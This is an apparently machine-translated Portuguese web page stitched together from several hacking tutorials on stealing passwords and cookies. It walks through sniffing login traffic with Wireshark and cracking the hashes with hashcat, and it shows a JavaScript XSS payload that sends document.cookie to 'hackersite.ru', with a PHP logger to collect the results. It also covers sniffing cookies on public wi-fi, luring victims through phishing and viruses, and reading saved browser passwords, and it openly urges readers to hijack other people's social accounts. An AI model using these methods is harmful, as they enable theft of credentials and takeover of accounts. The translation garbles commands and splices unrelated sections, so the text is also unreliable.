Muitos usuários não percebem que ao preencher login e senha ao se cadastrar ou autorizar em um recurso fechado da Internet e pressionar ENTER, esses dados podem ser facilmente interceptados. Muitas vezes eles são transmitidos pela rede de forma insegura. Portanto, se o site no qual você está tentando fazer login usa o protocolo HTTP, é muito fácil capturar esse tráfego e analisá-lo com usando Wireshark e então, usando filtros e programas especiais, encontre e descriptografe a senha.

O melhor local para interceptar senhas é o núcleo da rede, onde o tráfego de todos os usuários vai para recursos fechados (por exemplo, correio) ou na frente do roteador para acesso à Internet, ao se cadastrar em recursos externos. Montamos um espelho e estamos prontos para nos sentirmos como um hacker.

Passo 1. Instale e inicie o Wireshark para capturar tráfego

Às vezes, para isso, basta selecionar apenas a interface através da qual pretendemos capturar o tráfego e clicar no botão Iniciar. No nosso caso, estamos capturando através de uma rede sem fio.

A captura de tráfego começou.

Etapa 2. Filtrando o tráfego POST capturado

Abrimos o navegador e tentamos fazer login em algum recurso usando nome de usuário e senha. Assim que o processo de autorização for concluído e o site aberto, paramos de capturar tráfego no Wireshark. Em seguida, abra o analisador de protocolo e veja um grande número de pacotes. É aqui que a maioria dos profissionais de TI desiste porque não sabe o que fazer a seguir. Mas sabemos e estamos interessados ​​em pacotes específicos que contenham Dados de postagem, que são gerados em nossa máquina local ao preencher um formulário na tela e enviados para servidor remoto quando você clica no botão “Login” ou “Autorização” no navegador.

Entramos em um filtro especial na janela para exibir os pacotes capturados: http.solicitar.método == “PUBLICAR"

E vemos, em vez de milhares de pacotes, apenas um com os dados que procuramos.

Passo 3. Encontre o login e senha do usuário

Clique rapidamente com o botão direito e selecione o item no menu Siga TCP Steam

Depois disso, o texto aparecerá em uma nova janela que restaura o conteúdo da página em código. Vamos encontrar os campos “senha” e “usuário”, que correspondem à senha e nome de usuário. Em alguns casos, ambos os campos serão facilmente legíveis e nem mesmo criptografados, mas se tentarmos capturar tráfego ao acessar recursos muito conhecidos como Mail.ru, Facebook, VKontakte, etc., a senha será criptografada:

HTTP/1.1 302 encontrado

Servidor: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

P3P: CP="NOI ADM DEV PSAI COM NAV NOSSO OTRo STP IND DEM"

Set-Cookie: senha= ; expira = qui, 07 de novembro de 2024 23:52:21 GMT; caminho=/

Localização: logado.php

Comprimento do conteúdo: 0

Conexão: fechar

Tipo de conteúdo: texto/html; conjunto de caracteres=UTF-8

Assim, no nosso caso:

Nome de usuário: networkguru

Senha:

Etapa 4. Determine o tipo de codificação para descriptografar a senha

Por exemplo, acesse o site http://www.onlinehashcrack.com/hash-identification.php#res e digite nossa senha na janela de identificação. Recebi uma lista de protocolos de codificação em ordem de prioridade:

Etapa 5. Descriptografando a senha do usuário

Sobre nesta fase podemos usar o utilitário hashcat:

~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt

Na saída recebemos uma senha descriptografada: simplepassword

Assim, com a ajuda do Wireshark, podemos não só resolver problemas no funcionamento de aplicações e serviços, mas também nos testar como hackers, interceptando senhas que os usuários inserem em formulários web. Você também pode descobrir senhas para caixas de correio de usuários usando filtros simples para exibir:

• O protocolo POP e o filtro são assim: pop.request.command == "USER" || pop.request.command == "PASS"
• O protocolo e filtro IMAP serão: imap.request contém "login"
• Protocolo SMTP e você precisará inserir o seguinte filtro: smtp.req.command == "AUTH"

e utilitários mais sérios para descriptografar o protocolo de codificação.

Etapa 6: e se o tráfego for criptografado e usar HTTPS?

Existem várias opções para responder a esta pergunta.

Opção 1. Conectar quando a conexão entre o usuário e o servidor for interrompida e capturar o tráfego no momento em que a conexão for estabelecida (SSL Handshake). Quando uma conexão é estabelecida, a chave da sessão pode ser interceptada.

Opção 2: você pode descriptografar o tráfego HTTPS usando o arquivo de log da chave de sessão registrado pelo Firefox ou Chrome. Para fazer isso, o navegador deve estar configurado para gravar essas chaves de criptografia em um arquivo de log (exemplo baseado no Firefox) e você deverá receber esse arquivo de log. Essencialmente, você precisa roubar o arquivo da chave da sessão disco rígido outro usuário (o que é ilegal). Bem, então capture o tráfego e use a chave resultante para descriptografá-lo.

Esclarecimento. Estamos falando do navegador de uma pessoa cuja senha ela está tentando roubar. Se quisermos descriptografar nosso próprio tráfego HTTPS e quisermos praticar, essa estratégia funcionará. Se você estiver tentando descriptografar o tráfego HTTPS de outros usuários sem acesso aos seus computadores, isso não funcionará - isso é criptografia e privacidade.

Após receber as chaves conforme opção 1 ou 2, é necessário cadastrá-las no WireShark:

1. Vá para o menu Editar - Preferências - Protocolos - SSL.
2. Defina o sinalizador “Remontar registros SSL abrangendo vários segmentos TCP”.
3. “Lista de chaves RSA” e clique em Editar.
4. Insira os dados em todos os campos e escreva o caminho no arquivo com a chave

“Um smartphone com ferramentas de hacking? Não existe tal coisa”, teríamos dito a vocês recentemente. Foi possível lançar algumas das ferramentas habituais para implementar ataques apenas em alguns Maemo. Agora, muitas ferramentas familiares foram portadas para iOS e Android, e algumas ferramentas de hack foram escritas especialmente para o ambiente móvel. Um smartphone pode substituir um laptop em testes de penetração? Decidimos dar uma olhada.

ANDRÓIDE

Gerenciador de pacotes

Scanners de rede

Manipulação de tráfego

Túnel de tráfego

Rede sem fio

Auditoria de aplicativos da web

Vários utilitários

Acesso remoto

iOS

Trabalhando com o sistema

Interceptação de dados

Análise de rede sem fio

Scanners de rede

Controle remoto

Recuperação de senha

Explorando vulnerabilidades

O que é um biscoito?

Existe um mecanismo que permite ao servidor http salvar algumas informações de texto no computador do usuário e depois acessá-las. Essa informação chamado de biscoito. Essencialmente, cada cookie é um par: o nome de um parâmetro e seu valor. A cada cookie também é atribuído o domínio ao qual pertence. Por questões de segurança, em todos os navegadores o servidor http só tem permissão para acessar o cookie do seu domínio. Além disso, os cookies podem ter uma data de validade, caso em que ficarão armazenados no computador até essa data, mesmo que feche todas as janelas do navegador.

Todos os sistemas multiusuário utilizam cookies para identificar o usuário. Mais precisamente, a conexão atual do usuário com o serviço, sessão do usuário. Se alguém reconhecer seus cookies, poderá fazer login no sistema em seu nome. Porque em atualmente muito poucos recursos da Internet verificam alterações de endereço IP durante uma sessão de usuário.

Os desenvolvedores de navegadores não fornecem ferramentas integradas para edição de cookies. Mas você pode sobreviver com um bloco de notas normal.

Editor de registro do Windows versão 5.00



@="C:\\IE_ext.htm"

Salve-o com o nome IE_ext.reg

Passo 2: Usando o arquivo criado, adicione alterações ao registro do Windows.

Etapa 3: crie um arquivo de texto com texto

< script idioma="javascript">
external.menuArguments.clipboardData.setData("Texto", external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; caminho=/; domínio=testdomain.ru";
alerta(external.menuArguments.document.cookie);

Passo 4: Vamos ao site de nosso interesse.

Etapa 5: clique com o botão direito em um espaço vazio da página e selecione o item de menu "Trabalhando com Cookies". Permitir acesso à área de transferência. Seu biscoito disso local na rede Internet. Você pode inserir o bloco de notas e dar uma olhada.

Passo 6: Para alterar alguns cookies, edite o arquivo C:\IE_ext.htm, substituindo nome de teste em nome do biscoito, valor de teste- sobre o seu significado, testdomain.ru– para o domínio do site. Se necessário, adicione mais linhas semelhantes. Para facilitar o controle, adicionei ao script a saída dos cookies atuais antes e depois da alteração: alerta(external.menuArguments.document.cookie);

Etapa 7: execute a Etapa 5 novamente e atualize a página.

Resumindo: acessaremos este recurso da Internet com cookies atualizados.

Como roubar cookies usando JavaScript?

Se um invasor conseguir encontrar uma oportunidade de executar um script JavaScript arbitrário no computador da vítima, ele poderá ler os cookies atuais com muita facilidade. Exemplo:

var str=documento.cookie;

Mas ele conseguirá transferi-los para seu site, porque, como indiquei anteriormente, um script JavaScript não conseguirá acessar um site localizado em um domínio diferente sem confirmação adicional? Acontece que um script JavaScript pode carregar qualquer imagem localizada em qualquer servidor http. Ao mesmo tempo, transfira qualquer informação de texto na solicitação de download para esta imagem. Exemplo: http://hackersite.ru/xss.jpg?text_info Então, se você executar este código:

var img= nova imagem();

img.src= "http://hackersite.ru/xss.jpg?"+ encodeURI(documento.cookie);

Como lidar com essas solicitações de download de uma “imagem”?

Um invasor só precisa encontrar uma hospedagem com suporte a PHP e colocar lá um código como este:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Então todos os parâmetros de solicitação deste script serão salvos no arquivo log.txt. Resta apenas substituir o script JavaScript descrito anteriormente http://hackersite.ru/xss.jpg para o caminho para este script php.

Mostrei apenas a maneira mais simples de explorar vulnerabilidades XSS. Mas isso prova que a presença de pelo menos uma dessas vulnerabilidades em um site multiusuário da Internet pode permitir que um invasor use seus recursos em seu nome.

Olá, este pequeno artigo, bastante uniforme Pequena descrição Eu gostaria de me dedicar maneira simples interceptar cookies em redes wi-fi. Não vou contar aqui o que são cookies e por que são necessários, se uma pessoa tem interesse em interceptar “produtos de panificação”; em uma rede sem fio, acho que ele deveria saber o que é e por que precisa disso. Direi apenas uma coisa: usando esses arquivos você pode obter acesso às contas de outras pessoas em vários sites que exigem que os usuários passem por um processo de autenticação (por exemplo, mail.ru, vkontakte.ru, etc.).

Então vamos começar. Primeiramente precisamos encontrar a própria rede wireless, com gateway de acesso à Internet aberto, e é desejável que esta rede tenha bastante clientes. Por exemplo, qualquer rede em grandes shopping centers, aeroportos, diversas cafeterias é adequada nesses locais que as pessoas costumam usar; acesso wi-fi na Internet, para ler e-mails, verificar contas em vários sites de namoro, visualizar LJ e vários fóruns. Isso é exatamente o que precisamos. Decidida a escolha da localização da rede, tendo estudado determinados horários do número máximo de clientes, passemos diretamente às operações de combate. Para isso precisamos de um laptop com adaptador wi-fi e um determinado conjunto de programas. No meu caso, usei Notebook Acer Aspire 3610, placa wi-fi cliente D-Link DWL G650 e sistema operacional BackTrack3 instalado.

Aconselho que utilize este SO, pois já inclui todo o conjunto de programas que poderá necessitar, e a vantagem mais importante é que não necessita de instalar o Backtrack no seu Disco rígido, você pode inicializar este sistema operacional diretamente de um CD ou unidade flash.

Agora vamos passar para o software necessário. Usei o kismet para descoberta de rede e o WifiZoo para interceptar cookies. Vou me alongar em detalhes no segundo programa. WifiZoo é um scanner passivo de ondas aéreas e coleta bastante informação útil, como: pop3, tráfego smtp, cookies/authinfo http, msn, credenciais ftp, tráfego de rede telnet, nbt, etc. A única desvantagem deste programa é a falta do modo de salto de canal, o WifiZoo apenas escuta interface sem fio, e não pode, por assim dizer, pular de canal para canal. Mas esta desvantagem é compensada por outro programa, o Kismet, que suporta este modo. Para iniciar o WifiZoo você precisará de:

• Pitão
• assustador
• Kismet

Então, vamos iniciar o programa, primeiro vamos iniciar o Kismet para suportar o modo de salto de canal e, em seguida, iniciar o WifiZoo diretamente, a seguinte janela deve aparecer na sua frente:

Agora só falta sentar e esperar até interceptar algo; tudo o que o programa intercepta pode ser encontrado nos logs, que estão localizados no diretório com o programa /logs/. Você também pode iniciar uma interface GUI que se conecta automaticamente ao http em 127.0.0.1:8000

Não vou escrever sobre todos os recursos deste maravilhoso programa, acho que você mesmo descobrirá os outros recursos, já que no momento estamos interessados ​​​​apenas em cookies. Clique no link que diz cookies e veja o que interceptamos:

Maneiras de roubar biscoitos

Este método de hacking, roubo de cookies, funciona muito bem e é usado por muitos hackers. Se você também quer experimentar, mas não sabe o que fazer, leia nossas recomendações.

O que são biscoitos?

Estas são informações sobre a visita de um usuário a um site específico. Ele é armazenado em um local separado documento de texto. Lá você pode encontrar uma variedade de informações. Incluindo logins, senhas, endereços caixas de correio e números de telefone. É por isso que os ladrões se esforçam para colocar as mãos nesses documentos. Para roubar os materiais de que precisam, os hackers recorrem a diversos métodos.

Maneiras de roubar biscoitos

Vulnerabilidade XSS

Ele pode ser encontrado e usado em qualquer site. Quando um especialista encontra uma vulnerabilidade, ele a implementa código especial. Dependendo da finalidade, os códigos são diferentes; são escritos para um recurso específico. Quando um usuário visita esta página e a atualiza, todas as alterações são aplicadas. O código começa a agir - ele fica embutido no computador da vítima e coleta todos informação necessária do navegador.

Para introduzir código, você pode usar qualquer tipo de vulnerabilidade - um erro em um recurso da web, em um navegador ou em um sistema de computador.

Existem 2 tipos de ataques XSS:

Passiva - direcionado ao script da página. Nesse caso, você precisa procurar vulnerabilidades nos elementos da página. Por exemplo, uma aba com diálogos, uma caixa de pesquisa, um catálogo de vídeos, etc.

Ativo - você deve procurá-los no servidor. Eles são especialmente frequentes em diversos fóruns, blogs e chats.

Como forçar uma pessoa a aplicar XSS?

A tarefa não é fácil, pois muitas vezes para ativar o código é necessário clicar no link com ele. Você pode disfarçar o link e enviá-lo por e-mail junto com uma oferta interessante. Por exemplo, ofereça um grande desconto em uma loja online. Você também pode implementar tudo isso na imagem. O usuário provavelmente irá visualizá-lo e não suspeitará de nada.

Instalando um farejador

Esta é uma implementação programas especializados para monitorar o tráfego no dispositivo de outra pessoa. O sniffer permite interceptar sessões transmitidas com dados de outras pessoas. Desta forma você pode obter todos os logins e senhas, endereços, qualquer informação importante transmitido pela rede pelo usuário. Nesse caso, os ataques são mais frequentemente realizados em dados HTTP desprotegidos. O wi-fi inseguro funciona bem para isso.

Existem várias maneiras de implementar um sniffer:

• Copiar tráfego;
• Análise de dados utilizando ataques de tráfego;
• Ouvindo interfaces;
• Inserindo um sniffer em uma quebra de canal.

Roubando cookies usando um vírus

Os especialistas aconselham não usar cookies, a menos que haja uma necessidade especial. Se for possível desativá-los, é melhor fazê-lo. Isso ocorre porque os cookies são muito vulneráveis. Muitas vezes são roubados por criminosos. Uma grande quantidade de informações pessoais pode ser obtida desses arquivos. informação confidencial, que será usado contra uma pessoa. Os tipos de arquivos mais perigosos são aqueles que permanecem no sistema após o término da sessão.

Os cookies são frequentemente roubados usando um utilitário de vírus. Isso é feito de forma bastante simples. Qualquer utilitário seguro contém um vírus que coleta determinados materiais no computador. O programa de vírus será conectado ao servidor de seu proprietário. O programa deve ser configurado para que o navegador o utilize como servidor proxy.

Quando o programa chegar ao PC da vítima, ele começará automaticamente a coletar todos os dados armazenados e a enviá-los para você.

Os vírus são diferentes, suas funções também podem ser diferentes. Alguns permitem que você controle completamente o navegador e visualize qualquer informação. Outros são capazes de roubar materiais protegidos. Outros ainda coletam apenas dados não seguros.

Você pode ter dificuldade em introduzir um programa antivírus no computador de outra pessoa. É necessário forçar o usuário a baixá-lo e executá-lo. Aqui você pode enviar a ele uma carta com um link para o programa ou passar o programa como seguro e esperar que a pessoa faça o download do seu site.

Como proteger os cookies contra roubo?

A maioria dos recursos da web não está suficientemente protegida. Os hackers encontram facilmente vulnerabilidades e bugs nessas plataformas.

Regras de proteção de cookies:

1. Vincule o ID do computador à sessão atual. Então, ao fazer login no site a partir de um dispositivo de terceiros, uma nova sessão será iniciada e os dados da anterior não serão recuperados.
2. Vincule a sessão ao navegador. O mesmo princípio funcionará como no parágrafo anterior.
3. Criptografe os parâmetros enviados pela rede. Então as informações armazenadas no documento não serão compreensíveis. Será inútil para quem o interceptou. Esta técnica não irá protegê-lo 100%; alguns especialistas podem descriptografar qualquer material.
4. Crie uma pasta separada para identificadores.

Como descobrir a senha da conta de outra pessoa por meio de cookies?

Para obter os dados de login de outra pessoa, você deve primeiro acessar o arquivo no qual eles foram salvos.

Para quem usa Mozilla Firefox você precisa ir até a aba de ferramentas, localizada no menu principal. A seguir nas configurações do sistema você encontrará a seção “Proteção”, onde deverá procurar todas as informações importantes sobre contas nas redes sociais. Todas as senhas estão ocultas, então clique no botão “exibir”. Você pode instalar proteção imediatamente e definir um código especial. Então ninguém, exceto você, receberá esta informação.

No Opera, apenas nomes de usuário estão disponíveis para visualização pública. Mas no menu você encontra um gerenciador de senhas e visualiza tudo o que está armazenado no seu computador. Lista completa está no gerenciador. Para obter acesso às senhas, você precisa instalar uma extensão adicional.

EM Google Chrome Todos esses materiais podem ser vistos nas configurações avançadas. Existe uma aba com todos os cookies salvos.

Infelizmente, navegador padrão Internet Explorer não possui tais funções. Para saber informações sobre as plataformas web que o proprietário do PC visita, é necessário baixar um programa especial. Você pode encontrá-lo gratuitamente na Internet, é totalmente seguro, mas é melhor baixá-lo de fontes confiáveis. Não esqueça que qualquer programa deve ser verificado por um antivírus. Isto é especialmente verdadeiro para os utilitários que funcionam com senhas.

Esta técnica só é indicada para quem tem acesso físico ao computador da vítima. Você também pode descobrir a senha de outra pessoa se a pessoa fez login na plataforma pelo seu PC e salvou seus dados.

Programas para roubar cookies

Existem muitos fóruns de hackers na Internet onde os hackers se comunicam entre si. As pessoas vão para lá na esperança de obter ajuda gratuita. É lá que você pode encontrar um grande número de programas diferentes para hackear. Queremos avisá-lo que você não deve confiar nesses programas. Os utilitários para roubar cookies remotamente do dispositivo de outra pessoa são programas fictícios ou antivírus. Se você baixar este software para o seu PC, provavelmente cairá na armadilha de um golpista. Os golpistas publicam programas gratuitamente. Assim, eles distribuem software antivírus e ganham controle sobre os PCs de outras pessoas. Em geral, esses programas são uma farsa, você entenderá isso pela interface e pelo conteúdo. Se você for usar algum software para extrair arquivos, que sejam farejadores. Claro, usá-los não é tão fácil. E encontrar um bom farejador na Internet não é fácil. Mas esse software está disponível em especialistas que podem vendê-lo por dinheiro. Lembre-se de que existem muitos golpistas, cada um com seus truques. Você só deve confiar em hackers confiáveis ​​que tenham boa reputação, tenham avaliações e tenham seu próprio site.

Para concluir, gostaria de salientar que roubar cookies é um método verdadeiramente poderoso e cuja eficácia é muito elevada. Se você deseja hackear o perfil de alguém em uma rede social ou mensageiro instantâneo, considere esta opção. Este método funciona melhor quando você pode usar o computador da vítima. É muito mais difícil conseguir materiais à distância, mas você pode usar nossas dicas e tentar colocar esse método em prática.

No capítulo